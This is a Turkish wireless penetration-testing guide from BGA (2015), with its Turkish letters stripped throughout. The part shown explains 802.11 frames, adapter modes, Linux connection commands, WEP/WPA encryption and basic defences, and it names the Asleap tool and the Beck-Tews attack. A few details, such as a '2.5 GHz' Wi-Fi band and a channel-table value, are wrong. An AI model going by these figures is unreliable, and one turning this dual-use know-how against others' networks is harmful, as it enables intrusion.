1) pentest Çalışmalarında kablosuz ağ güvenlik testleri

Pentest almalarnda Kablosuz A Gvenlik Testleri

Ender AKBA

April 2015

BGA Information Security www.bga.com.tr

[PENTEST ALIMALARINDA KABLOSUZ A GVENLIK TESTLER] 2

BLG GVENL AKADEMS | 2015 | www.bga.com.tr

indekiler Kablosuz Alar ve Gvenlik .............................................................................................. 3

Temel Kavramlar ......................................................................................................................... 3 Kablosuz A Yntemleri ve A Arabirim Modlar ..................................................................... 9

Kablosuz a arabirim alma modlar ...................................................................................... 9 Kablosuz A Balant Yntemleri ............................................................................................ 10 Infrastructure mode : Eriim noktas balant yntemi ................................................................. 10 Promiscuous mod ve monitor mod fark ..................................................................................... 11 Kablosuz A Balanma Aamalar .......................................................................................... 12

Linux Sistemlerden Kablosuz Alara Balant ....................................................................... 13 WPA Korumal Alara Linux Sistemler zerinden Balanmak .......................................................... 14

Kablosuz A Gvenlik Testleri iin Ortam oluturma .......................................................... 17 Vmware ile Kablosuz A adaptrlerini Kullanma ..................................................................... 17

Kablosuz Alarda ifreleme ve Kimlik Dorulama ............................................................................ 19 WEP ........................................................................................................................................ 19 WPA/WPA2 ............................................................................................................................. 20 TKIP ......................................................................................................................................... 20 CCMP ...................................................................................................................................... 20 802.1x ...................................................................................................................................... 21 EAP(Extensible Authentication Protocol) ................................................................................. 21

Kablosuz Alarda Gvenlik nlemleri .................................................................................. 22 Eriim noktas ntanml Ayarlarnn Deitirilmesi ................................................................. 22 Eriim Noktas smini Grnmez Klma: SSID Saklama ......................................................... 22 Eriim Kontrol ........................................................................................................................ 22 MAC tabanl eriim kontrol ..................................................................................................... 22 ifreleme Metodu ..................................................................................................................... 23

Kablosuz A Gvenlik Testleri ................................................................................................. 25 Kablosuz Alarda Keif almalar ........................................................................................ 25 Kablosuz Alara Ynelik Saldr eitleri ................................................................................ 30 Kablosuz Ada ifreleme Protokolleri ve Krma almalar ................................................... 33 Sahte Eriim Noktas (AP) Kurulumu ve Trafik nceleme ............................................................... 49 Captive Portal Gvenlik Testleri .................................................................................................. 57

AP/Router zerinde kan Zafiyetler ....................................................................................... 63 Ek-1: Kablosuz A Gvenlik Testleri Kontrol Listesi .......................................................................... 68 Ek-2: Yazda kullanlan ara listesi ................................................................................................... 69 Referanslar ................................................................................................................................... 70



Kablosuz Alar ve Gvenlik Bu dokmanda kablosuz alar ile ilgili kavramlar ve bunlarla ilgili gvenlik tehditleri, atak vektrleri verilmitir. Dokman boyunca kullanlan yazlm/donanm bilgisi aadaki gibidir.

Donanm&Yazlm

TP-LINK TLWN722N (150 Mbps)

USB portlu kablosuz a adaptr (Atheros AR9271)

Macbook Pro OSX 10.9.4

VMware Fusion Kali Linux 3.14-kali1-686-pae

Pineapple Mark V

Temel Kavramlar Kablosuz alarda gnmzde kullandmz kablolu alardan farkl baz nemli noktalar vardr. Bu noktalarn daha iyi anlalabilmesi iin sadece kablosuz alara zel baz tanmlarn, terimlerin bilinmesi faydal olacaktr. Kablosuz a: Bilgisayarlar ve a cihazlar arasndaki verilerin kablosuz olarak hava ortamnda iletildii bir a eididir. Wi-Fi, cep telefonlar ve radyo dalgalarn kullanan dier uygulamalar(TV/Radyo/Uydu gibi) kablosuz a iinde deerlendirilebilir. Bu yazda kablosuz yerel alardan(WLAN) bahsedilmitir. nternetin evlere girmesiyle yaygnlamtr. Bireysel kullanclarn yan sra bir ok kurumda da kablosuz alar bulunur. Tanabilirlik ve maddi adan kolaylklar getirse de tayabilecei veri trafii ve trafiin izlenebilir olmas kablosuz alar riskli klar. Kablosuz alar ve kablolu alara dair karlatrma tablosu aadaki gibidir.

Kablolu a Kablosuz a

Kapasite/yk Geni Snrl

Topoloji Point-to-point Broadcast

Gvenilirlik Gvenilir Gvensiz

Tanabilirlik Sabit Tanabilir

Kablosuz alar iin IEEE 802.11 standartlar uygulanmaktadr ve OSI modelinde fiziksel katmanda (1.katman) yer almaktadr. IEEE 802.11 standartlar ada bulunan cihazlarn birbirleri ile iletiimini salamas iin gerekli kurallar ortaya koyan bir protokoldr. Bu standartlarn gelien teknoloji ve ihtiyaca gre getirdii bant



genilii, frekans gibi farkllklar konunun ilerleyen ksmlarnda verilecektir. 2004 ylnda klasik 802.11 standartlar yerini daha iyi veri gvenliinin ve kimlik dorulama metotlarnn saland 802.11iye brakmtr. Bu yeni standartlar RSN(Rebost Security Network) olarak da anlmaktadr. Frame: Kablosuz alarda haberleme frame(ereve) zerinden gerekleir. 802.11 standartlarna uygun bir frame aadaki gibidir. lk 2 Bytelk ksm Frame Controldur. Frame Control ise kendi iinde farkl ksmlara ayrlr. Bu yaz iin nemli olanlar Frame Type ve Frame Subtypedr.

Frame Type, WLAN framein tipini belirleyen ksmdr. 3 eidi vardr: Management, Control ve Data. Management Frame: A cihaz ile istemci arasndaki balantnn kurulmasyla ilgilidir. 10 farkl alt-tipi vardr. Bunlar arasnda Authentication, Deauthentication, Beacon ve Probe frameler bizim iin nem arzedenlerdir. Wireshark (WS) filtresi: wlan.fc.type == 0

Authentication frame (1): A cihaz ile istemci arasndaki balant istei, balantnn kabul veya ret edilmesi gibi bilgiler bu frame ierisinde tanr.

Deauthentication frame (2): A cihaz veya istemci(bazen durumlarda saldrganlar) balanty koparmak istediinde bu frame kullanlr.

Beacon frame (8): Kablosuz a cihazlar srekli olarak iinde ismi(SSID) ve dier bilgileri(frekans,tip, MAC vb.) barndran beacon frameler yaynlar. Bylece kullanclar yayn yapan APleri grebilir ve buna gre balanabilir. Beacon framee dair ekran grnts Wireshark zerinden alnmtr. IEEE 802.11 Beacon Frame ksmnda Type parametresinin Management olduu grlebilir. Subtype ise 8dir. nk Beacon frame Management Framein 10 alt-tipinden 8.sidir. Wiresharkta sadece Beacon frameleri grntlemek iin; wlan.fc.type_subtype==0x08 filtresi uygulanabilir.

Probe Request (stek): stemciler daha nce balandklar ve otomatik olarak balan seeneinin aktif olduu kablosuz alar iin etrafa Probe Requestler gnderir. rnein evde Ev isminde bir



kablosuz a olsun ve cep telefonu zerinden bu aa balanp otomatik balan seenei aktif edilsin. Cep telefonunun kablosuz a, Evden uzakta bir yerde aktif edildiinde, telefonun kablosuz a adaptr Ev buralarda msn? mesajlar yollayacaktr.

Control Frame: A cihaz ile istemci arasndaki veri trafiinin doruluu, btnl bu frame zerinde tanr. 3 farkl alt-tipi vardr: Acknowledgement(ACK), Request-to-send(RTS), Clear-to-send(CTS). WS filtresi: wlan.fc.type == 1

Data Frame: Asl bilginin tand framelerdir. WS filtresi wlan.fc.type == 2



WEP: Kablosuz alarda kablolu alara edeer gvenlik salama amac ile gelitirilmi ve yaygn olarak kullanlan bir WLAN ifreleme protokoldr. WPA: WEPde kan gvenlik zafiyetlerinin giderilmesi ve yeni zelliklerin eklenmesi ile karlm gvenlik protokoldr. Temel olarak WEP kullanr sadece anahtar deiimi ve IV sabiti farkldr. WPA-II: Geici zm olan WPAnn yerini 2004te WPA-2 almtr. APye balant 4l el skmayla salanr. Access Point(AP)(Eriim Noktas): Kablosuz a cihazlarnn balanarak bir a oluturduu merkezi cihaz. Bu cihaz bir donanm olabilecei gibi zelletirilmi bir Linux datm da olabilir. SSID : Access Point(Eriim Noktas)nn tanmlayc ad. 802.11x : IEEE tarafndan tanmlanm ve kablosuz a cihazlarnn nasl alacann belirtildii standartlar dizisi. Kanal(Channel): APnin hangi frekansta yayn yapacan, her biri frekans aralklarna denk gelen 1 ile 14 arasndaki deerlerle belirtir. Wi-Fide genelde 2.5 GHz band kullanlr ve bu band 5MHzlik aralklarla 14 kanala ayrlmtr. Her AP ayn anda 1 kanalda alr. letiimin salanmas iin AP ve istemcinin ayn kanalda(frekansta) olmas gerekir. APlerin birbirine yakn bantlarda almas durumunda frekanslar stst gelir(overlapping) ve ortamdaki grlty(noise) artrr. Bu nedenle genelde birbirine grece uzak olan 1, 6 ve 11 kanallar tercih edilir.



Kanal Dk Frekans Merkez frekans Yksek frekans

1 2.401 2.412 2.423

2 2.406 2.417 2.428

3 2.411 2.422 2.433

4 2.416 2.427 2.438

5 2.421 2.432 2.443

6 2.426 2.437 2.448

7 2.431 2.442 2.453

8 2.436 2.447 2.458

9 2.441 2.452 2.463

10 2.451 2.457 2.468

11 2.451 2.462 2.473

Kablosuz A Standartlar eitli firmalar tarafndan retilmi kablosuz a cihazlarnn birbirleri ile sorunsuz haberleebilmesi iin uymas gereken baz standartlar vardr. Bu standartlar IEEE belirler, kablosuz alar iin 802.11 ailesi belirlenmitir. Gnmzde youn kullanlan baz 802.11x standartlar ve zelikleri aada verilmitir.

802.11b 2.4 GHz aralnda alr Maksimum bant genilii 11Mbps 30-75m aras performans Gnmzde yaygn kullanlyor

802.11a

5GHz aralnda yayn yapar Maksimum bant genilii 54Mbps 25-50m civarnda performans

802.11g

802.11b uyumlu 2.4 GHz aralnda 54 Mbpse kadar kan hz kapasitesi

802.11i

Gvenli WLAN kullanm iin dnlm 802.11a ve 802.11b WLAN'lari arasndaki iletiimin ifrelenmesini belirler



AES TKIP(temporary key integrity protocol) gibi yeni ifreleme metotlar kullanr.

802.11n Bant genilii, hz ve kapsama alan artmtr. 2.4 GHz ve 5 GHzde alabilir. AES ifreleme metodu kullanlr.



Kablosuz A Yntemleri ve A Arabirim Modlar

Kablosuz a arabirim alma modlar

Kablosuz a adaptrleri kullandklar srcye ve yapaca ileve bal olarak drt farkl modda alabilir. Bunlar: Managed, Master(hostap), Ad-hoc ve Monitor mod. Master Mod: Etraftaki kablosuz a istemcilerine hizmet vermek iin kullanlan mod. Eriim noktas olarak adlandrlan cihazlarda kablosuz a adaptrleri bu modda alr. Managed Mod: Bir eriim noktasna balanarak hizmet alan istemcinin bulunduu mod. Ad-Hoc Mod: Arada bir AP olmakszn kablosuz istemcilerin haberlemesi iin kullanlan mod.

Monitor Mod: Herhangi bir kablosuz aa balanmadan pasif olarak ilgili kanaldaki tm trafiin izlenmesine olanak salayan mod. Kablosuz alarda gvenlik konusunda sk sk kullanlan bir moddur.



Kablosuz A Balant Yntemleri Kablosuz alar temelde iki modda alr: bunlardan biri Ad-hoc dieri de Infrastructure mod olarak adlandrlmtr. Genellikle, kablosuz a kullanm amacmza gre bu iki moddan birini seme durumunda kalrz.

Ad-hoc mod, iki kablosuz a cihaznn arada baka bir birletiriciye(AP) ihtiya duymadan haberleebildii durumdur. Teknik olarak Independent Basic Service Set(IBSS) olarak da bilinir. Ad-hoc balantlar genellikle evde kiisel ilerimiz iin kullanrz. Mesela, bir evde iki bilgisayar ve birinin internet balants var, dier bilgisayarda internete karmak istersek nmze iki seenek kyor: ya iki bilgisayar arasnda bir kablo ekerek iki bilgisayar direk birbirine balayacaz ya da bir hub/switch alarak iki bilgisayar bu arac cihazlar ile konuturacaz. Oysa bunlardan baka bir seeneimiz daha var -tabi eer her iki bilgisayarda

kablosuz a adaptr varsa-. Bu iki cihazn kablosuz a adaptrlerini Ad-hoc modda alacak ekilde ayarlarsak ve internete kan bilgisayarda balant paylam yaparsak iki makinede zgr bir ekilde interneti kullanabilecektir. Burada makinelerin Linux, Windows ya da Mac olmas farketmez. Tanmlanan deerler standartlara uygun olduu mddete her ilemi kolaylkla yaplabilir. Piyasada 20-30 $ dolara bulunabilecek USB kablosuz a adaptrleri ile ya da kullandnz dizst bilgisayarn kendi sistemi ile kolaylkla Ad-hoc mod kablosuz a kurulabilir. Ksaca Ad-hoc mod iin herhangi bir AP'e gerek duymadan kablosuz a cihazlarnn birbirleri arasnda haberlemesidir diyebiliriz.

Infrastructure mode : Eriim noktas balant yntemi Infrastructure mode ortamdaki kablosuz a cihazlarnn haberlemesi iin arada AP gibi bir cihaza ihtiya duyulmasdr. Ad-hoc moda gre biraz daha karmaktr ve zel olarak ayarlamadysak iletim sistemimiz bu modu kullanacak ekilde yaplandrlmtr. Teknik olarak Basic Service Set olarak da bilinir(BSS). Infrastructure modda kablosuz a istemcileri birbirleri ile direkt konutuklarn dnrler fakat tm paketler AP aracl ile iletilir. Burada aa dahil olmayan herhangi bir kablosuz a cihaznn tm trafii izleme riski vardr. Bu

sebeple Infrastructure mod kullanrken genellikle iletiim ifrelenir. ifreleme amal olarak WEP ya da WPA gibi protokoller kullanlr. ifreli iletiimde aradaki trafik izlense bile anlalmaz olacaktr.



Promiscuous mod ve monitor mod fark Klasik yaplan hata promiscuous mod ve monitor modun kartrlmasdr. Bu iki moda birbirinden tamamen farkldr. Monitor mod, bir kablosuz a arabiriminin herhangi bir aa balanmadan o aa ait tm trafii izleyebilmesine olanak verir. Promiscuous mod ise bir aa balanldnda o ada duruma gre- tm trafii izleyebilmenizi salar. Kablosuz alarda Wireshark gibi sniffer aralar kullanrken Promiscuous mod seili ise bazen hi paket yakalayamazsnz. Bu kullandnz kablosuz a adaptrnn ya da srcsnn Promiscuous mod desteklemediini gsterir.



Kablosuz A Balanma Aamalar Authentication(Kimlik dorulama): Bir kullanc sisteminin APye kimlik dorulayarak aa dahil olmasnn ilk admdr. Bu admda iletilen frameler ifrelenmemektedir(nk management framelerden birisidir). 2 eit kimlik dorulama tanmlanmtr: Open ve Shared Key.

Open System Authentication: Bu tip kimlik dorulamada istemciden iinde MAC adresinin olduu bir istek gider ve APden istein kabul veya reddediine dair bir cevap dnlr.

Shared Key Authentication: Kimlik dorulama iin ortak olarak bilinen bir anahtar(parola) kullanlr. nce istemci APye bir balant isteinde bulunur. AP kullancya challenge text gnderir. stemci bilinen anahtar bilgisiyle bu metini ifreler ve APye gnderir. AP ifreli metini alr ve zerinde belirlenen asl anahtarla bu metinin ifresini zer. Eer ifresi zlm olan metin, kullancya ilk olarak gnderilen challenge text ile aynysa parola doru demektir. Kullancya kimlik dorulama iin kabul veya ret ieren cevap dnlr.

Association (Aa kayt olma): stemciler kimlik dorulama admn getikten sonra AP tarafndan aa kayt edilmelidir(association). Bu ilem olmadan istemciden gelen/giden frameler AP tarafndan yoksaylr. Bir istemci ayn anda sadece bir aa kayt olabilir ve kayt ilemi sadece iletiim AP zerinden gerekletii Infrastructure modda gerekleir. stemci association iin bir istek gnderir, AP istei deerlendirir ve olumlu yada olumsuz cevap dner. Eer cevap olumluysa association cevab iinde istemciyi daha sonra tanmak iin atanan bir ID bulunur(Association ID(AID)).



Linux Sistemlerden Kablosuz Alara Balant Linux sistemler kablosuz a yaplandrmas iin zengin seeneklere sahiptir. Her Linux datmnn kendi grafik arabirimli yaplandrmas olduu gibi tm Linux datmlar iin geerli komutlar kullanmak da her zaman hazr seenek olarak durmaktadr. Bir kablosuz a cihaznn neler yapabileceini dnelim; ncelikle bulunduu evredeki alr vaziyette bulunan erisim noktalarn grmek isteyecektir, bulduu eriim noktalarndan birini seerek balanmak ve gerekli IP yaplandrmasn girmesi gerekecektir, ya da eriim noktas tarafndan verilen hazr bilgileri kullanacaktr. Eer eriim noktasnda gvenlik amal ifreleme kullanlmsa kullanlan protokole(WEP/WPA) uygun anahtarn da doru ekilde girilmesi gerekir. Kapsama alannda bulunan Eriim Noktalarn(Access Point) kefetmek iin iwlist komutu uygun parametreler ile kullanlr. Linux makinemizdeki wireless Ethernet arabiriminin eth1 olduunu varsayarsak evremizdeki APleri aadaki komut ile grebiliriz.

root@byte: ~# iwlist eth1 scan eth1 Scan completed : Cell 01 - Address: 00:05:60:D5:CE:76 ESSID:"Byte Test" Mode:Master Frequency:2.417GHz Quality:0/10 Signal level:-70 dBm Noise level:-256 dBm Encryption key:off Bit Rate:1Mb/s Bit Rate:2Mb/s Bit Rate:5.5Mb/s Bit Rate:11Mb/s Cell 02 - Address: 00:04:2B:52:15:58 ESSID:"Sebil Net" Mode:Master Frequency:2.467GHz Quality:0/10 Signal level:-22 dBm Noise level:-256 dBm Encryption key:on Bit Rate:1Mb/s Bit Rate:2Mb/s Bit Rate:5.5Mb/s Bit Rate:11Mb/s

Peki hangi arabirimimizin kablosuz a adaptr olduunu nasl anlarz? Bunun iin de iwconfig komutu parametresiz kullanlrsa Linux bilgisayarmzda bulunan a adaptrleri inceleyerek hangilerinin kablosuz a adaptr olduunu bize syleyecektir. Bulunan eriim noktalarndan herhangi birine balanmak iin iwconfig komutunu kullanyoruz.

root@byte: ~# iwconfig eth1 essid Byte Test



root@byte: ~# ifconfig eth1 up root@byte: ~# ifconfig eth1 192.168.1.2 netmask 255.255.255.0

ya da otomatik IP aldrmak iin

root@byte: ~# dhclient eth1 root@byte~ # dhcpcd -n eth1

komutlar kullanlabilir. Yaplandrlm arabirime ait zellikleri grmek istersek;

root@byte: ~# iwconfig eth1 eth1 IEEE 802.11-DS ESSID:"Byte Test" Mode:Managed Frequency:2.457GHz Access Point: 00:05:60:D5:CE:76 Bit Rate:2Mb/s Tx-Power=15 dBm Sensitivity:1/3 RTS thr:off Fragment thr:off Encryption key:on Power Management:off Link Quality:46/92 Signal level:-51 dBm Noise level:-94 dBm Rx invalid nwid:0 invalid crypt:0 invalid misc:0

komutunu vermemiz yeterlidir. Balanmak istediimiz erisim noktas WEP kullanacak ekilde ayarlandysa bunu da parametre olarak belirtmeliyiz.

root@byte: ~# iwconfig eth1 key 12345768901234567890123465

WPA Korumal Alara Linux Sistemler zerinden Balanmak iwlist ve iwconfig aralar WEP ile korunan APlere balanmak iin kullanlr. WPA tipinde bir APye balanmak iin wpa_supplicant arac kullanlr. ou Linux datmnda ykl gelir. Eer ykl deilse;

root@kali:~# apt-get install wpasupplicant

WPA ile ilgili bilgiler bir yaplandrma dosyas iinde saklanr. Bu dosyaya yazmak iin wpa_passphrase arac kullanlr.

root@kali:~# wpa_passphrase BGA Bga123456 > wpa.conf



Yukardaki komutta BGA yerine balanmak istediiniz eriim noktasnn SSIDsi ve Bga123456 yerine WPA anahtar yazlr. Cevap aadaki gibi wpa.conf dosyasna yazlr.

network={ ssid="BGA" #psk="Bga123456" psk=646fa82263e0f2aec5759ff3f1b409e4cde4557a68d64c45df5904ced2c4af0d }

Ancak yukardaki komutta WPA parolas komut gemiinde yeralaca iin gvenli deildir. Bunun yerine sadece wpa_passphrase SSID_ismi eklinde kullanlrsa imle aa iner bizden anahtar girmemizi bekler.

root@kali:~# wpa_passphrase BGA > wpa.conf # reading passphrase from stdin Bga123456 network={ ssid="BGA" #psk="Bga123456" psk=f0fa6500777f065586521a4e4244f2ee123af6303f70b1b75ebb127c0c8f81be }

Yaplandrma dosyasna gerekli bilgiler yazldktan sonra imdi wpa_supplicant aracyla aa balanlabilir. Komutun genel hali u ekildedir:

wpa_supplicant -D[driver] -i[arayz] -c[/wpa_supplicant.conf dosyasnn tam yolu]

Driver seenekleri wpa_supplicant yazp entera basldnda aadaki gibi listelenir. Hangi driver eidi olduu bilinmiyorsa wext kullanlabilir.

drivers: wext = Linux wireless extensions (generic) nl80211 = Linux nl80211/cfg80211 wired = Wired Ethernet driver none = no driver (RADIUS server/WPS ER)

Arayz iwconfig komutu sonucunda kan kablosuz adaptrn bal olduu arayz ifade eder. Genelde wlan0, wlan1 gibi deerler alr. wpa.conf dosyas baka bir yol belirtilmemise zerinde altmz dizine yazlmtr. rnek balanma komutu u ekildedir.

wpa_supplicant -Dwext -iwlan1 -c/root/wpa.conf -B

Sorun yaanyorsa /etc/network/interfaces dosyas herhangi bir metin editryle(vi, nano gibi) alr ve aadaki satrlar yazlr.



iface wlan1 inet dhcp wpa-conf /root/wpa.conf (yaplandrma dosyasnn tam yolu) auto wlan1

Aadaki komutlar iletilir.

ifconfig wlan1 down ifconfig wlan1 up /etc/init.d/networking restart

Tekrar denenir.

wpa_supplicant -Dwext -iwlan1 -c/root/wpa.conf -B

IP almak iin;

dhclient wlan1



Kablosuz A Gvenlik Testleri iin Ortam oluturma Kablosuz alarda gvenlik konusu pratii zor olan bir konudur. Bunun temelde iki sebebi vardr. Birincisi kablosuz a adaptrleri src eksikliinden genelde Windows altnda test yapacak fonksiyonlara sahip deildir. Bu gibi testler iin Linux kullanlmas ok daha pratik olacaktr. Dier bir konu da bakalarnn kablosuz alar zerinden yaplacak testler etik olmayaca iin kendi kablosuz a ortamnzda almalar yapmanz gerektiidir. Eer kullanlan Eriim Noktas(Access Point) paylaml ise yapacanz testlerden dier kullanclar etkilenecektir. Bu durumda son are olarak yeni bir donanm almak gerekmektedir. Dier bir yntem de bir adet USB zerinden alan kablosuz a adaptor alp Vmware ierisinden bu adaptr kullanmaktr. Bylece hem mobil bir APe sahip olunup, hem de kablosuz alarda gvenlik testi yaparken Windowsun kstlayc zelliklerine taklmadan Linux zerinden istenilen ilemler yaplabilir. Bylece istediinizde sanal bir APye istediinizde de Linux altnda test yapmak iin kullanabileceiniz kablosuz bir a adaptrne ulam olacaksnz.

Vmware ile Kablosuz A adaptrlerini Kullanma Gerek iletim sisteminde kullanlan kablosuz a kartlarn, Vmware altnda da ayn zelliklerde kullanmak ne yazk ki mmkn olmaz. Vmwareden arabirim modunu bridge, NAT yaplarak kablosuz a kartnzn yararland balant Vmware makineye salanabilir fakat bu Vmware zerinde kablosuz bir a kart olarak alglanmaz. Sradan bir ethernet kart gibi Vmwarein kendi srclerini kullanarak ilem yaplr. Bu durumda kablosuz alara balanp analiz yapma imkanmz yoktur. Ancak USB ile balanlan bir kablosuz a kart ile bu ilem yaplabilir. Gercek sisteminizin Windows, Vmwaredeki sisteminiz Linux ise USB wireless kartinizi Vmware altnda gercek zellikleri kullanabilmek icin Vmware surumu 6.x, Vmware player kullaniyorsaniz guncel surumu olmaldr. Bundan sonras Vmwarein menulerinden usb cihazi Vmwaree wireless kart olarak tantmak ve srcnn salad wireless zelliklerini kullanmaya kalyor. Not: Vmwarein kullanaca USB wireless kart gerek iletim sisteminin tanimas gerekmez. Windowsta:



OSXte:



Kablosuz Alarda ifreleme ve Kimlik Dorulama 802.11 Standart Kimlik dorulama ifreleme ifreleme

algoritmas Anahtar retilme

metodu

WEP Open/Shared Key WEP RC4(24 bit) Statik

WPA(SOHO*) PSK TKIP RC4(48 bit) Dinamik

WPA2(SOHO) PSK CCMP AES Dinamik

WPA(Kurumsal) 802.1x TKIP RC4(48 bit) Dinamik

WPA2(Kurumsal) 802.1x CCMP AES Dinamik

*SOHO(Small office/home office): Kk ev ve ofis alarn ifade eder.

WEP Hem ifreleme protokolnn hem de kimlik dorulama ileminin addr. Bu gvenlik protokolnde ilk balarda kstlamalardan dolay 64 bitlik WEP key kullanlyordu. 64 bitin, 24 biti verinin ifrelenmesi ve zlmesi iin kullanlan initialization vector(ksaca IV olarak anlr) ve 40 biti ise anahtardan(key) oluur. Anahtar diye bahsedilen aslnda o kablosuz a iin girilen parola bilgisidir. 40 bitlik bir yer ayrld iin parola olarak en fazla 10 alfanumerik karakter kullanlabilir. Bu 64 bit, RC4 denilen kriptografik bir algoritmayla ileme sokulur ve baka bir deer elde edilir. Son olarak oluturulan deer ve asl veri XOR mantksal ilemine sokulur. Bylece WEP korumas salanarak ifreli veri oluturulur. Daha sonradan baz kstlamalar kaldrlm ve 128 bit,152 bit, 256 bit destekleyen WEP sistemleri baz reticiler tarafndan salanmtr. Bunlar iinde IV deeri 24 bittir.

retilen her IVnin tek(unique) olmas gerekir. Ancak aktif bir ada yaklak 5000 paketten sonra ayn IV deerinin tekrarkanma ihtimali %50dir. IVleri toplamak iin ARP paketleri yada TCP paketler izlenir ve kaydedilir. ARP paketleri AP tarafndan tekrar tekrar yaynland(broadcast) iin toplamas daha kolaydr.



WPA/WPA2 WEP zerindeki ciddi gvenlik zafiyetleri dolaysyla geici bir zm olarak, 2003 ylnda 802.11 veri gvenliinde ve ifreleme metodundaki gelitirmelerle ortaya kmtr. TKIP ifreleme metodunu kullanan WPA tantlmtr. Bu sadece geici bir zmdr. 2004 ylnda ise 802.11i yaynlanmtr. Bu yeni standartta veri gvenlii iin AES ifreleme algoritmas ve CCMP ifreleme metodunun kullanld WPA2 ortaya kmtr. Kimlik dorulama metodu iin ise 802.1X(kurumsal) ve Preshared Key(PSK)(kiisel ve kk lekli kullanm iin) metotlar gelitirilmitir. WPA2de parolann dorulanma aamas 4l el skmayla(4 way handshake) tamamlanr. WPAda ifreleme metodu olarak TKIP kullanlmaktadr. AES-CCMP ve WEPi de baz durumlarda destekler. WEPteki zafiyetlere kar 3 gvenlik nlemi ile gelmitir.

Birincisi, anahtar ve IV, kriptografik algoritmaya tabi tutulmadan nce bir fonksiyona sokulur ve o ekilde gnderilir. WEPte ise bu ilem hatrlanaca zere 24 bitlik IV ve 40 bitlik anahtarn normal olarak birletirilip RC4 algoritmasna sokuluyordu.

kincisi paketler iin bir sra numaras(sequence number) koyar. Bylece ardarda sahte istek gnderilmesi durumunda(replay attack) AP bu paketleri yoksayacaktr.

nc olarak ise paketlerin btnln kontrol etmek amacyla 64 bitlik Message Integrity Check (MIC) eklenmitir. WEPte ierii bilinen bir paket, ifre zlmese dahi deitirilebilir.

TKIP Byk lde WEPe benzerlik gstermektedir. WEP zerinde etkili olan bir ok ataktan etkilenir. Beck-Tews atak olarak bilinen bir yntemle, zlebilen bir paket bana 7-15 paket aa enjekte edilebilir. Bu yntemle ARP zehirleme, servis d brakma gibi saldrlar gerekletirilebilir. Ancak bu ilem WPA parolasnn ortaya karlmas manas tamamaktadr.

CCMP CCMP, AES alnarak verilerin ifrelenmesi iin tasarlanan bir ifreleme protokoldr. WEP ve TKIPye gre daha gvenlidir. Gvenlik adna getirdii yenilikler;

Veri gvenlii: Sadece yetkili ksmlar tarafndan eriilebilir. Kimlik dorulama: Kullancnn gerekliini dorulama olana verir Eriim kontrol: Katmanlar aras balant/ynetim gelitirilmitir.



802.1x Kablolu ve kablosuz alar iin IEEE tarafndan belirlenen bir standarttr. Aa dahil olmak isteyen cihazlar iin port bazl bir denetim mekanizmasdr. Bu denetim kimlik dorulama(authentication) ve yetkilendirme(authorization) admlarn kapsar. 3 bileenden oluur: 1- Supplicant; aa dahil olmak isteyen sistem, 2- Authenticator; genelde switch veya AP(eriim noktas) 3- Authentication server; RADIUS, EAP gibi protokolleri destekleyen bir yazlmdr.

Bir kullanc aa dahil olmak istediinde kullanc ad/parola veya dijital bir sertifikay authenticatora gnderir. Authenticatorda bunu Authentication servera iletir. letim ileminde EAP metotlar kullanlr. zellikle kurumsal alarda yzlerce, binlerce kullanc iin sadece bir tane parola bilgisiyle aa dahil etmek beraberinde baka skntlarda getirebilir. Bu nedenle byk alarda WPA - Enterprise kullanlr. alanlar Active Directory/LDAPtan kontrol edilen kullanc ad/parola bilgileriyle aa dahil olabilirler.

EAP(Extensible Authentication Protocol) EAP kimlik denetimi iin bir ok metot barndran bir protokoldr. EAP ats altnda en bilinen metotlar;

EAP-PSK, EAP-TLS, LEAP, PEAP.

EAP eitleri EAP-TLS: Kablosuz alarda kimlik dorulama iin standart ve en gvenli metottur. Sertifika veya akll kart kullanlan alar iin elzemdir. LEAP: Cisco tarafndan gelitirilmi bir kimlik dorulama metodudur. MS-CHAPn deitirilmi bir versiyonu gibidir. Zafiyet barndran bir metottur ve ancak gl bir parola ile kullanlmaldr. Asleap adl ara bu metodun istismar iin kullanlabilir. Yerini yine Cisco tarafndan gelitirilen EAP-FASTe brakmtr. PEAP: Sadece sunucu tarafl PKI sertifikasna ihtiya duyar. Kimlik dorulama gvenlii iin TLS tunel zerinden bilgiler iletilir.



Kablosuz Alarda Gvenlik nlemleri Kablosuz alardaki en temel gvenlik problemi verilerin hava ortamnda serbeste dolamasdr. Normal kablolu alarda switch kullanarak gvenlik fiziksel olarak salanabiliyor ve switche fiziksel olarak bal olmayan makinelerden korunmu olunuyordu. Oysaki kablosuz alarda tm iletiim hava ortamnda kurulmakta ve veriler geliigzel ortalkta dolamaktadr.

Eriim noktas ntanml Ayarlarnn Deitirilmesi Kablosuz alardaki en byk risklerden birisi alnan eriim noktas cihazna ait ntanml ayarlarn deitirilmemesidir. ntanml ayarlar eriim noktas ismi, eriim noktas ynetim konsolunun herkese ak olmas, ynetim arabirimine girite kullanlan parola ve ifreli alarda an ifresidir. Yaplan aratrmalarda kullanclarn ounun bu ayarlar deitirmedii grlmtr. Kablosuz alarn gvenliine dair yaplmas gereken en temel i ntanml ayarlarn deitirilmesi olacaktr.

Eriim Noktas smini Grnmez Klma: SSID Saklama Kablosuz alarda eriim noktasnn adn(SSID) saklamak alnabilecek ilk temel gvenlik nlemlerinden biridir. Eriim noktalar ortamdaki kablosuz cihazlarn kendisini bulabilmesi iin devaml anons ederler. Teknik olarak bu anonslara beacon frame denir. Gvenlik nlemi olarak bu anonslar yaptrmayabiliriz ve sadece eriim noktasnn adn bilen cihazlar kablosuz aa dahil olabilir. Bylece Windows, Linux da dahil olmak zere birok iletim sistemi etraftaki kablosuz a cihazlarn ararken bizim cihazmz gremeyecektir. SSID saklama her ne kadar bir nlem olsa da teknik kapasitesi belli bir dzeyin zerindeki saldrganlar tarafndan rahatlkla renilebilir. Eriim noktasnn WEP ya da WPA protokollerini kullanmas durumunda bile SSIDlerini ifrelenmeden gnderildiini dnrsek ortamdaki kt niyetli birinin zel aralar kullanarak bizim eriim noktamzn adn her durumda renebilmesi mmkndr.

Eriim Kontrol Standart kablosuz a gvenlik protokollerinde aa giri anahtarn bilen herkes kablosuz aa dahil olabilir. Kullanclarnzdan birinin WEP anahtarn birine vermesi/aldrmas sonucunda WEP kullanarak gvence altna aldmz kablosuz amzda gvenlikten eser kalmayacaktr. Zira herkeste ayn anahtar olduu iin kimin aa dahil olacan bilemeyiz. Dolays ile bu tip alarda 802.1x kullanmadan tam manas ile bir gvenlik salanamayacaktr. 802.1x kullanlan alarda u an iin en byk atak vektr sahte kablosuz a yaynlardr.

